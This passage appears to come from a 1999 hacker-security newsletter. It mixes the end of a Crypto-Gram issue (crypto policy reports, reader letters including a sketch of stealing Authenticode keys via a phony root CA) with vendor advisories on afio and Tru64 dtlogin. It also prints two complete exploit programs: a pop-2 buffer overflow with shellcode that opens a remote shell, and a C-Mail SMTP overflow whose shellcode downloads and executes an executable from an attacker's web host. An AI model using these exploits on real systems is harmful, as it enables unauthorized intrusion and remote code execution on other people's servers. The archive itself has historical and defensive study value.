pages), produced by the Electronic Privacy Information Center (EPIC). Here's the executive summary: "Most countries in the world today have no controls on the use of cryptography. In the vast majority of countries, cryptography may be freely used, manufactured, and sold without restriction. This is true for both leading industrial countries and for developing countries. There is a movement towards international relaxation of regulations relating to encryption products, coupled with a rejection of key escrow and recovery policies. Many countries have recently adopted policies expressly rejecting requirements for key escrow systems and a few countries, most notably France, have dropped their escrow systems. There are a small number of countries where strong domestic controls on the use of cryptography exist. These are mostly countries where human rights command little respect. "Recent trends in international law and policy point toward continued relaxation of controls on cryptography. The Organization for Economic Cooperation and Development's Cryptography Policy Guidelines and the Ministerial Declaration of the European Union, both released in 1997, argue for the liberalization of controls on cryptography and the development of market-based, user driven cryptography products and services. There is a growing awareness worldwide of encryption and an increasing number of countries have developed policies, driven by the OECD guidelines. "Export controls remain the most powerful obstacle to the development and free flow of encryption. The revised December 1998 Wassenaar Arrangement may roll back some of the liberalization sought by the OECD, particularly by restricting the key lengths of encryption products that can be exported without approval licenses. However, several major countries have already indicated that they do not plan to adopt new restrictions. "The United States government continues to lead efforts for encryption controls around the world. The U.S. government has exerted economic and diplomatic pressure on other countries in an attempt to force them into adopting restrictive policies. The U.S. position may be explained, in part, by the dominant role that national intelligence and federal law enforcement agencies hold in the development of encryption policy." http://www2.epic.org/reports/crypto1999.html ** *** ***** ******* *********** ************* International Encryption Products The ACP has commissioned a study on the availability of international encryption products. It's called "Growing Development of Foreign Encryption Products in the Face of U.S. Export Regulations." Here are excerpts from the executive summary: "Development of cryptographic products outside the United States is not only continuing but is expanding to additional countries; with rapid growth of the Internet, communications-related cryptography especially is experiencing high growth, especially in electronic mail, virtual private network, and IPsec products. This report surveys encryption products developed outside the United States and provides some information on the effect of the United States export control regime on American and foreign manufacturers. "We have identified 805 hardware and/or software products incorporating cryptography manufactured in 35 countries outside the United States. The most foreign cryptographic products are manufactured in the United Kingdom, followed by Germany, Canada, Australia, Switzerland, Sweden, the Netherlands, and Israel in that order. Other countries accounted for slightly more than a quarter of the world's total of encryption products. "The 805 foreign cryptographic products represent a 149-product increase (22%) over the most recent previous survey in December 1997. A majority of the new foreign cryptographic products are software rather than hardware. Also, a majority of these new products are communications-oriented rather than data storage oriented; they heavily tend towards secure electronic mail, IP security (IPsec), and Virtual Private Network applications. "We identified at least 167 foreign cryptographic products that use strong encryption in the form of these algorithms: Triple DES, IDEA, Blowfish, RC5, or CAST-128. Despite the increasing use of these stronger alternatives to DES, there also continues to be a large number of foreign products offering the use of DES, though we expect to see a decrease in coming years. "On average, the quality of foreign and U. S. products is comparable. There are a number of very good foreign encryption products that are quite competitive in strength, standards compliance, and functionality." http://www.seas.gwu.edu/seas/institutes/cpi/library/docs/cpi-1999-02.pdf ** *** ***** ******* *********** ************* Comments from Readers From: "John C. Kennedy" Subject: Novell Having worked with Novell's security group closely for the last three and a half years on cryptographic and network security issues, I want to point out a couple of things that aren't quite apparent about the remote console password encryption hack that you report on in your latest newsletter. (Disclaimer: This is in no way an official response from Novell, merely a constructive comment by an informed party.) The use of the remote console feature for managing NetWare servers is something that Novell has advised against for quite some time to begin with. Server console access is something that Novell strongly recommends be protected by physical access restrictions: http://developer.novell.com/research/appnotes/1997/november/06/04.htm Novell's security experts have *always* considered the use of remote console capabilities to be a fundamentally risky proposition to begin with. Console access allows direct access to the NetWare trusted computing base. However, when customers demand such a feature and are willing to take the risk it is difficult for any company to say no. If one assesses network security from a "weakest link in the chain" perspective, it is the fact that access to console services is available remotely *at all* that is probably a bigger risk than the weak password encryption technique employed. Console access is not something that should be granted based simply on single factor authentication, but in many "low threat" environments this is an acceptable risk/convenience trade-off to make. The password obfuscation technique may seem amateurish at first glance, but it most likely has more to do with some exportability issue than lack of expertise or knowledge within Novell's security group. The design pre-dates my association with Novell by a couple of years, but I am confident that it was not due to ignorance within the security staff. Obfuscation techniques are not something anyone likes to bet the farm on, and Novell's strong caveats about the use of rconsole reflects this. Novell has been working for the last couple of years on an architecture to permit strong encryption for authentication purposes without allowing that same capability to be exploited as an uncontrolled method for confidentiality. This is not an easy problem to tackle, but Novell's new international cryptographic services architecture in fact solves this "crypto with a hole" problem for both Novell and its customers. (http://www.novell.com/corp/security/) Regardless of one's position on the crypto export issue, we all know that this has been a real problem for software and hardware vendors for quite some time. It is especially difficult to solve for companies that ship to so many different import/export jurisdictions. U.S. export laws are matched by equally restrictive import laws in many countries. The ability to field policy-controlled crypto will allow Novell to bring new network security mechanisms to the global market based on cryptography that is "strong" by anyone's measure. I think your chastising of Novell is well-intentioned, but fails to acknowledge that, (1) weak cryptography *is not* always the weakest link in the security chain and (2), that import/export laws have had predictable and, to date, largely unavoidable results in software designs destined for global markets. So-called "strong cryptography" can lend a false sense of security or be otherwise counterproductive when viewed in the larger context that many vendors have to address. A context that, in fact, most casual observers have neither the patience or necessary intimate knowledge to address. From: "Robert A. Lerche" Subject: Microsoft's Internet Explorer MS IE does not provide a means for encrypting downloaded personal certificates. Netscape prompts for a password and encrypts local storage (although I think you're allowed to specify a blank password), but MS IE doesn't. From: "Jack Hewlett" Subject: Who's at risk? You continually publish articles saying how bad various security software products are. So the obvious question is, "Who's at risk here, the Retailer or the Consumer?" I've never understood the need to be secretive about my Credit Card Numbers. It seems to me, I could publish my Credit Card number in the newspaper, and "I" would not be at any risk! If a charge appears on my monthly statement and I can show the following: 1. The merchandise was NOT shipped to my address. 2. The Retailer does NOT have a piece of paper containing my signature. 3. The Retailer does NOT have a recording containing my voice. then surely I'm under no legal obligation to pay that portion of the bill. This is a very important topic for the individual. If all the risk associated with weak security software falls on the Retailer, then I don't have to care about this topic. If my suppositions are incorrect, then how do I protect myself against all the clerks who see my Credit Card Number when I use it in a retail establishment? I understand that I have legal obligations to report a card stolen when I no longer have physical possession of it. But, since it is impossible for me to control knowledge of the Number (and Expiration Date), can the "fine print" of the Credit Acceptance I signed hold me fiscally responsible for something I can't control? Even if I did sign such terms, would they hold up in court, when I argue that I did nothing wrong and acted in a prudent manner? From: Geoff Thorpe Subject: Hacking root CAs in Internet Explorer I note my mate Peter Gutmann's email about substituting root CAs into IE's "certificate store". I think I actually alerted him to this, and the problem remains in more recent versions. IE Version 4 also registers the ".der" file extension so that an ASN encoded self-signed X509 CA certificate saved as cert.der and double-clicked will automatically launch the "Accept new CA cert?" dialog of IE. By default, all the options are enabled (ticked), including authenticating client and server certs (https), authenticating email certs (S/MIME), and software signing (Authenticode). Even the default button is "OK," so hitting enter is enough. They have, however, added a new dialog box, so that selecting OK gives a quick "Are you sure" type warning, displays all the information about the cert (distinguished name components, expiry dates, etc.) and the default button in this case is "No" (you have to click Yes to accept it). This still does not address the fact that most users will not really grasp the gaping security hole this creates for them -- though at least Netscape Communicator goes some way towards letting them know you REALLY should check up on the cert's authenticity before giving it too much trust -- and they have a neat option to always provide warnings when using certs signed by the new CA cert in question. There's a very dangerous attack permitted by this lax attitude towards accepting CA certs. If you can get anyone with an Authenticode signing key (perhaps a developer has a signed cert from Verisign or whoever) to accept a phony CA cert, then all hell can break loose. You can then get native code in a signed .cab file (signed with a cert that is signed from the phony CA) onto the developer's machine (it's now trusted, so they will not be given warnings -- and depending on their settings, they may not even be *told anything*). That native code can use MS's CryptoAPI to retrieve the developer's Authenticode private key (in typical fashion, the API does not require a password to retrieve the key) and mail it out to the hacker. That hacker then has someone else's code-signing cert and key. Using it, they can put signed viruses around, and provide signed hacked versions of software (perhaps providing a "mirror" of popular software all of which is really just dressed-up and highly creative "fdisk" variations) -- and if law enforcement ever get involved, their only lead will be the unfortunate developer's Authenticode cert. Of course, if the hacker can plant phony CA certs around everywhere, he/she can always just create their own phony CA-signed Authenticode certs (perhaps named "Microsoft Corp.") and use those. But the point being illustrated here is that the hacker only needs to get the phony CA into *one* developer's machine (not everybody they want to hack); after that, he/she has someone else's digital identity with which to wreak havoc. But this brings me around to an issue I had been wanting to mention, and relates to a background project of mine. Microsoft has its own cert-trust settings, store, and API (if any at all); so does Netscape, so does any S/MIME-enabled mailer, so does any secure tunneling utility, etc. etc. Not only has this led to a complete decentralisation (it's pretty much "per-application") on a user's system as to his/her "trust" settings, it has also led to the inevitable incompatibilities of standards -- just ask anyone working for a CA about processing cert-requests for IE (and each version thereof), Navigator, and the popular web-servers. They're all various mutations and modifications of ASN, X509, PEM, and MIME that give massive headaches for anyone who wants to dream of cross-compatibility (as of now, I don't know anyone who has managed to make a single user-cert (with private key) work on Communicator and IE simultaneously). My idea had been loosely termed the "PKI kernel" -- a core library and interface that is presumed present and callable on all systems being compiled and deployed. Unlike the proliferation of various PKI toolkits using various standards (PKIX, etc.) and proprietary interfaces, I wanted to just put the minimum necessary core in to allow some centralisation -- and to ensure it was thin enough that it did not impose functional restrictions on applications using it. E.g., I was thinking that this should not be a "provider plug-in" architecture, as its very benefit would come from it being singular and ubiquitous on a system. It would not provide any cryptographic tools (ciphers, PKC encryption, etc.), and it would not provide any services (SSL tunneling, SSH, etc.) -- it would simply be a way to centralise root certs, user certs, pending cert-requests, and private keys, and maintain policies as to their use. At its most rudimentary, it could just be a free-for-all cert repository. At its more refined, it could be a strict framework where a root-user has stipulated that policies are inherited from another system and that only certain certs can be used for certain things. E.g., an app can ask the core for a list of "user certs" for use with "https" or check if a particular CA cert is trusted for a certain task, the policy could stipulate that any signed (user) certs imported into the core for use with S/MIME must be at least 1024 bits and signed by the "X" CA, etc. It just seems that each operating system has one concept of "print management", or "the TCP/IP stack", etc., and yet every single crypto-enabled program seems to have its own concept of trusted root certs, cert-policies, key-usages, and all the incompatibilities that come with them. They all use the same "protocols" (SSL/TLS, S/MIME, etc.), and they all use the same "algorithms" (RC4, RSA, etc.), because everyone sensibly agrees that it's best to just get one standard right than many different standards simultaneously, yet it's often overlooked that authenticity and identification depend very much on the careful and coordinated handling of certification, which every application seems to want to have its own individual poke at. ** *** ***** ******* *********** ************* CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety. CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography. Counterpane Systems is a six-person consulting firm specializing in cryptography and computer security. Counterpane provides expert consulting in: design and analysis, implementation and testing, threat modeling, product research and forecasting, classes and training, intellectual property, and export consulting. Contracts range from short-term design evaluations and expert opinions to multi-year development efforts. http://www.counterpane.com/ Copyright (c) 1999 by Bruce Schneier @HWA 107.0 pop.c a pop-2 remote exploit by smiler ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * A pop-2 remote exploit that gives a nobody shell. * gcc pop.c -o pop -O3 -Wall * Autodetects what version you're sploiting and adjusts ret position and * offset accordingly. * Tested on redhat 5.2, 5.1, 5.0 and 4.2. Probably only really useful * using it on 5.2 tho, cos the rest will most likely have imap open too. * NB: To exploit pop-2 you have to take into account the length of both * the hostname and username(unlike all the pop2 exploits out there). * - smiler */ #include #include #include #include #include #include #include #include #include #include unsigned char hellcode[]= "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01" "\x20\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89" "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0" "\xfe\xc0\xcd\x80\xe8\xcf\xff\xff\xff\x0f\x42\x49\x4e\x0f" "\x53\x48"; struct type { char *text; int offset; int alignment; }; struct type types[]={ {"4.46",0,0}, {"3.35",0,19}, {"3.44",0,19}, {"2.3(30)",0,19}, {NULL,0,0}}; int pop2_type = 0; #define RET 0xbffff5b1 void usage(char *prog); int resolv(char *hname, struct in_addr *addr); int send_oberflow(int fd, char *host, char *user, int offset); void run_shell(int fd); int set_pop_type(char *buf, int n); int do_connect(struct sockaddr_in *serv); char temp_pass[20], *password; int main(int argc, char **argv) { int fd,n; unsigned char buf[2048]; struct sockaddr_in servaddr; if (argc < 5) usage(argv[0]); password = strdup(argv[3]); bzero(argv[3],strlen(argv[3])); /* Mask the password from the cmdline =) */ bzero(&servaddr,sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_port = htons(109); if (!resolv(argv[4],&servaddr.sin_addr)) { herror("resolv"); exit(-1); } fd = do_connect(&servaddr); if ((n = recv(fd, buf, 1024, 0)) <= 0) { perror("recv"); return -1; } /* Get the banner */ write(STDOUT_FILENO, buf, n); set_pop_type(buf,n); printf("Pop type = %d\n",pop2_type); /* HELO localhost:dave password */ sprintf(buf, "HELO %s:%s %s\r\n",argv[1],argv[2],password); send(fd, buf, strlen(buf), 0); printf("Sleeping\n"); sleep(3); n = recv(fd, buf, sizeof(buf), 0); send_oberflow(fd, argv[1], argv[2], argv[4]?atoi(argv[4]):0); // recv(fd, buf, sizeof(buf), 0); run_shell(fd); return 0; } void run_shell(int fd) { int n; char recvbuf[1024]; fd_set rset; while(1) { FD_ZERO(&rset); FD_SET(fd, &rset); FD_SET(STDIN_FILENO, &rset); select(fd+1,&rset,NULL,NULL,NULL); if (FD_ISSET(fd, &rset)) { n = recv(fd, recvbuf, 1024,0); if (n <= 0){ fprintf(stderr,"Connection closed\n"); return; } write(STDOUT_FILENO, recvbuf, n); } if (FD_ISSET(STDIN_FILENO, &rset)) { n = read(STDIN_FILENO, recvbuf, 1024); if (n <= 0) return; send(fd, recvbuf, n, 0); } } return; } int send_oberflow(int fd, char *host, char *user, int offset) { unsigned char buf[1050]; int ret,ctr,a = 0; ret = 1016 - strlen(host) - strlen(user); ret -= types[pop2_type].alignment; memset(buf,0x90,sizeof(buf)); memcpy(buf,"FOLD ",5); for (ctr = ret - strlen(hellcode);ctr < ret; ctr++) buf[ctr] = hellcode[a++]; *(unsigned long *)(buf + ret) = RET + offset + types[pop2_type].offset; strcpy(buf + ret + 4,"\r\n"); send(fd, buf, strlen(buf), 0); return 1; } int do_connect(struct sockaddr_in *serv) { int fd; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (fd < 0) { perror("socket"); exit(-1); } if (connect(fd, (struct sockaddr *)serv, 16) < 0) { perror("connect"); exit(-1); } return fd; } int set_pop_type(char *buf, int n) { int ctr = 0; buf[n] = 0; while(types[ctr].text) { if (strstr(buf,types[ctr].text)) { pop2_type = ctr; return 1; } ctr++; } pop2_type = 0; return pop2_type; } int resolv(char *hname, struct in_addr *addr) { struct hostent *res; if (inet_aton(hname,addr)) return 1; res = gethostbyname(hname); if (res == NULL) return 0; memcpy((char *)addr,(char *)res->h_addr, sizeof(struct in_addr)); return 1; } void usage(char *prog) { fprintf(stderr,"Usage: %s "\ " [offset]\n",prog); exit(-1); } @HWA 108.0 afio: security hole in 'afio -P pgp' encrypted archives ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 11 Jun 1999 16:55:30 -0000 From: cezar@CS.NET.PL To: BUGTRAQ@netspace.org Subject: (fwd) SECURITY: afio: security hole in 'afio -P pgp' encrypted archives Hello, Just found it on comp.os.linux.announce. Sorry if it was already on the list. cezar -----BEGIN PGP SIGNED MESSAGE----- I believe that there are very few people who use afio's -P option for encrypting afio archive contents with pgp. If you do not use afio, pgp, or the 'afio -P pgp' option, it is safe to skip this message. I. Description Since version 2.4.2, the afio archiver has had an interface, the '-P pgp' command line option, which can be used to pgp-encrypt the file data written to an afio archive. Following up on some bug reports, I have recently discovered a security problem with this afio-pgp interface: pgp encryption is not always applied in the right way. This makes it possible to crack the encryption on the file data in an 'encrypted' archive produced using afio with the '-P pgp' option. The security of files which were already encrypted _before_ being written to the archive is not affected. The security hole is not in pgp itself, but in the interaction between afio and pgp. Other programs which interact with pgp to encrypt things are very unlikely to have a similar security hole. II. Impact It is possible to crack the encryption of at least some of the file data in the 'encrypted' archives produced using 'afio -P pgp'. This includes archives produced using the pgp_write example script included in the afio distribution. The attack against the broken archive encryption is obscure, but not impossible to find. The next version of afio (due out in 1-n months) will fix the security bug. By reverse-engineering the bug fix, it will be easier to find the attack. So the release of the next afio version will make already-existing 'afio -P pgp' archives more vulnerable. III. Solution _Existing archives_ produced with 'afio -P pgp' should really be treated with the same care (against theft etc.) as unencrypted archives. If such existing archives cannot be deleted or safely locked away, then encrypting the _entire_ existing archive file with pgp will protect it. Such completely encrypted archives will _not_ be fault-tolerant against storage media errors, like normal afio archives are. _New archives_ which really need to be protected with encryption can be made by having afio output the archive to stdout and piping this output through pgp: 'find [options] | afio -o [options] - | pgp [options] >device_or_file'. Such encrypted archives will _not_ be fault-tolerant against storage media errors, like normal afio archives are. The next version of afio (due out in 1-n months) will fix this security hole by which 'afio -P pgp' creates unsafe archives. On a personal note: I don't use PGP myself, and am not an expert in dealing with security bugs. Obviously, reporting the existence of the bug makes existing archives more vulnerable. Before I get flamed for handling this in entirely the wrong way: yes, I did ask some experts first, and this procedure is what came out. Koen. (current afio maintainer) - -- This article has been digitally signed by the moderator, using PGP. http://www.iki.fi/mjr/cola-public-key.asc has PGP key for validating signature. Send submissions for comp.os.linux.announce to: linux-announce@news.ornl.gov PLEASE remember a short description of the software and the LOCATION. This group is archived at http://www.iki.fi/mjr/linux/cola.html -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: latin1 iQCVAgUBN2A06FrUI/eHXJZ5AQFliAQAiY+ViFPj6ADX323dVh2P/H1BBD7lBs/8 pR+JYYNReWqmr75Nvx33KtxGjlZmr/DG5cLp6Wb91RD4Xj2qZQkpoEUq5BjjkGFh 6kUKBD49Z6G3XDEzlGUH1UBchvnB8zBTTHMG4T1KzL0xkXBDIn1GjrLNZSOiMyAs g1koMsqZANk= =yXea -----END PGP SIGNATURE----- -- end of forwarded message -- -- cezar CYBER Service / PKFL @HWA 109.0 C-Mail SMTP Server Remote Buffer Overflow Exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 16 Jun 1999 16:42:43 -0400 From: pw To: BUGTRAQ@netspace.org Subject: C-Mail SMTP Server Remote Buffer Overflow Exploit This is an exploit for a buffer overflow in the C-Mail SMTP Server which recently had an advisory posted for it by the Eeye Digital Security Team. I would like to thank them for telling me about the vulnerability before it was released. Everything is standard in the exploit except that the shellcode is placed before the return address on the buffer, because there isn't enough room after it. To execute the shellcode we put a small stub of code after our return address and have the return address point to a jmp esp. The small stub of code when executed points ecx to our shellcode and jumps to it. We can do this because ecx will always point to the start of our shellcode's original buffer before its copied at overflow time (at least in this version). This has been tested with only one version of C-Mail, unfortunately I don't have the version number written down and my evaluation period is up :). I can say that it is the version which was being distributed from their web site about 2 months ago. There are return addresses in the following exploit which should work under win95, 98 and NT. To compile it under win32 just remove the "#define UNIX". -mcp <---------------------------CUT HERE------------------------> #define UNIX #ifndef UNIX #include #include #include #include #define CLOSE _close #define SLEEP Sleep #else #include #include #include #include #include #include #include #define CLOSE close #define SLEEP sleep #endif /* CMail Exploit by _mcp_ Sp3 return address and win32 porting by acpizer */ const unsigned long OFFSET = 635; const unsigned long LENGTH = 650; const unsigned long CODEOFFSET = 11; char code[] = "\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1" "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF" "\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x5B\xC1\xE3\x10\x66\xBB" "\x18\x79\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46" "\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x5B\xC1\xE3" "\x10\x66\xBB\x44\x79\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66" "\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33" "\xC9\x51\x51\x51\x51\x51\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51" "\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6" "\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF" "\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57" "\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1" "\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66" "\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D" "\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46" "\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F" "\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71" "\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66" "\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53" "\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30" "\x30\x00"; /*This is the encrypted /~pw/owned.exe we paste at the end */ char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1"; /* Below is: add ecx, 10 jmp ecx We use this to transfer to our code that we store before the return address on our overflow buffer, We have to do this because there isn't near enough room behind the return address to include the code. If we weren't lucky enough to have a register pointing virtually right to our code we could include a routine that searches memory for specific dword in a specific direction relative to a register's value then transfers control to our code located there. The code can also be easyly snuck in on another buffer by doing this. */ char controlcode[] = "\x83\xc1\x0A\xFF\xE1"; unsigned int getip(char *hostname) { struct hostent *hostinfo; unsigned int binip; hostinfo = gethostbyname(hostname); if(!hostinfo) { printf("cant find: %s\n",hostname); exit(0); } #ifndef UNIX memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length); #else bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length); #endif return(binip); } int usages(char *fname) { printf("Remote Buffer Overflow exploit v1.2 by _mcp_ .\n"); printf("Win32 Porting and nt sp3 address By Acpizer \n"); printf("Usages: \n"); printf("%s \n", fname); printf("win98:\n"); printf(" = 0xBFF79243\n"); printf("NT SP3:\n"); printf(" = 0x77E53FC7\n"); printf("NT SP4:\n"); printf(" = 0x77E9A3A4\n"); printf("Will make running CSMMail download, save, and\n"); printf("execute http:///~pw/owned.exe\n"); exit(0); } main (int argc, char *argv[]) { int sock,targethost,sinlen; struct sockaddr_in sin; static unsigned char buffer[20000]; unsigned char *ptr,*ptr2; unsigned long ret_addr; int len,x = 1; unsigned long rw_mem; #ifndef UNIX WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if (err != 0) exit(1); #endif if (argc < 4) usages(argv[0]); targethost = getip(argv[1]); len = strlen(argv[2]); if (len > 60) { printf("Bad http format!\n"); usages(argv[0]); } ptr = argv[2]; while (x <= len) { x++; (*ptr)++; /*Encrypt the http ip for later parsing */ ptr++; } if( (sscanf(argv[3],"0x%x",(unsigned long *) &ret_addr)) == 0) { printf("Input error, the return address has incorrect format\n"); exit(0); } sock = socket(AF_INET,SOCK_STREAM,0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = targethost; sin.sin_port = htons(25); sinlen = sizeof(sin); printf("Starting to create the egg\n"); ptr = (char *)&buffer; strcpy(ptr,"VRFY "); ptr+=5; memset((void *)ptr, 0x90, 7000); ptr2=ptr; ptr2+=OFFSET; memcpy ((void *) ptr2,(void *)&ret_addr, 4); ptr2+=8; /* Put the code on the stack that transfers control to our code */ memcpy((void *) ptr2, (void *)&controlcode, (sizeof(controlcode)-1) ); ptr2=ptr; ptr2+=LENGTH; (*ptr2)=0x00; ptr+=CODEOFFSET; memcpy((void *) ptr,(void *)&code,strlen(code)); (char *) ptr2 = strstr(ptr,"\xb1"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2++; (*ptr2)+= len + ( sizeof(dir) ); (char *) ptr2 = strstr(ptr,"\x83\xc6"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2+= 2; (*ptr2)+= len + 8; ptr+=strlen(code); memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */ ptr+=len; memcpy((void *) ptr,(void*) &dir, (sizeof(dir)-1) ); printf("Made the egg\n"); if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) { perror("error:"); exit(0); } printf("Connected.\n"); #ifndef UNIX send(sock, (char *)&buffer, strlen((char *)&buffer), 0); send(sock,"\r\n",2,0); #else write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char *)&buffer */ write(sock,"\r\n",2); #endif SLEEP(1); printf("Sent the egg\n"); #ifndef UNIX WSACleanup(); #endif CLOSE(sock); exit(1); } @HWA 110.0 CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 11 Jun 1999 11:11:10 -0700 (PDT) From: CIAC Mail User To: ciac-bulletin@rumpole.llnl.gov Subject: CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability [ For Public Release ] -----BEGIN PGP SIGNED MESSAGE----- __________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ INFORMATION BULLETIN Tru64/Digital UNIX (dtlogin) Security Vulnerability June 10, 1999 21:00 GMT Number J-044 ______________________________________________________________________________ PROBLEM: There is a potential vulnerability with the /usr/dt/bin/dtlogin in Compaq's Tru64/DIGITAL UNIX software, where under certain circumstances, a user may gain unauthorized access as superuser. PLATFORM: Systems running Tru64/DIGITAL UNIX V4.0B, V4.0D, V4.0E and V4.0F. DAMAGE: Under certain circumstances, a user may gain unauthorized access as superuser. SOLUTION: Apply the vendor-supplied patch. ______________________________________________________________________________ VULNERABILITY The risk is high due to the possibility of gaining a root ASSESSMENT: compromise. ______________________________________________________________________________ [ Start Compaq Computer Corporation Advisory ] ________________________________________________________ UPDATE: May 11, 1999 TITLE: Tru64/DIGITAL UNIX V4.0b, V4.0d, V4.0e and V4.0f Potential Security Vulnerability ref#: SSRT0600U "dtlogin" SOURCE: Compaq Computer Corporation Software Security Response Team "Compaq is broadly distributing this Security Advisory in order to bring to the attention of users of Compaq products the important security information contained in this Advisory. Compaq recommends that all users determine the applicability of this information to their individual situations and take appropriate action. Compaq does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, Compaq will not be responsible for any damages resulting from user's use or disregard of the information provided in this Advisory." - ----------------------------------------------------------------------- IMPACT: Compaq has discovered a potential vulnerability with the /usr/dt/bin/dtlogin in Compaq's Tru64/DIGITAL UNIX software, where under certain circumstances, a user may gain unauthorized access as superuser. - ----------------------------------------------------------------------- RESOLUTION: This potential security problem has been resolved and a patch for this problem has been made available for Tru64/DIGITAL UNIX V4.0B, V4.0D, V4.0E and V4.0F. Systems with enhanced security enabled and one or more of the products listed below, should install this patch immediately. - Distributed Computing Environment (DCE) from Compaq - - Advanced Server for Digital UNIX (ASDU) from Compaq - - AFS Enterprise File Systems from Transarc - - Kerberos 4 Network Authentication Protocol from MIT If you need this patch for V4.0, V4.0A or V4.0C, please contact your normal Compaq Services support channel. *This solution will be included in a future distributed release of Compaq's Tru64/DIGITAL UNIX. This patch may be obtained from the World Wide Web at the following FTP address: http://www.service.digital.com/patches Use the FTP access option, select DIGITAL_UNIX directory, then choose the appropriate version directory and download the patch accordingly. Note: [1] The appropriate patch kit must be installed following any upgrade to V4.0b, V4.0d, V4.0e or V4.0f. [1a] These patches may be used on any patch kit/base level. [2] IMPORTANT - Please review all README and release notes which are related to this patch or an official patch kit, prior to installation of this patch. Additional Considerations: This patch updates the following component: /usr/dt/bin/dtlogin If you believe you have, or aren't sure if you have, previously installed a patch to this module you should contact your normal Compaq Service channel. Also, if you need further information, please contact your normal Compaq Services support channel. Compaq appreciates your cooperation and patience. We regret any inconvenience applying this information may cause. As always, Compaq urges you to periodically review your system management and security procedures. Compaq will continue to review and enhance the security features of its products and work with customers to maintain and improve the security and integrity of their systems. ________________________________________________________ Copyright (c) Compaq Computer Corporation, 1999 All Rights Reserved. Unpublished Rights Reserved under the Copyright Laws Of The United States. ________________________________________________________ [ End Compaq Computer Corporation Advisory ] ______________________________________________________________________________ CIAC wishes to acknowledge the Compaq Computer Corporation for the information contained in this bulletin. ______________________________________________________________________________ For additional information or assistance, please contact CIAC: CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at: Voice: +1 925-422-8193 FAX: +1 925-423-8002 STU-III: +1 925-423-2604 E-mail: ciac@llnl.gov For emergencies and off-hour assistance, DOE, 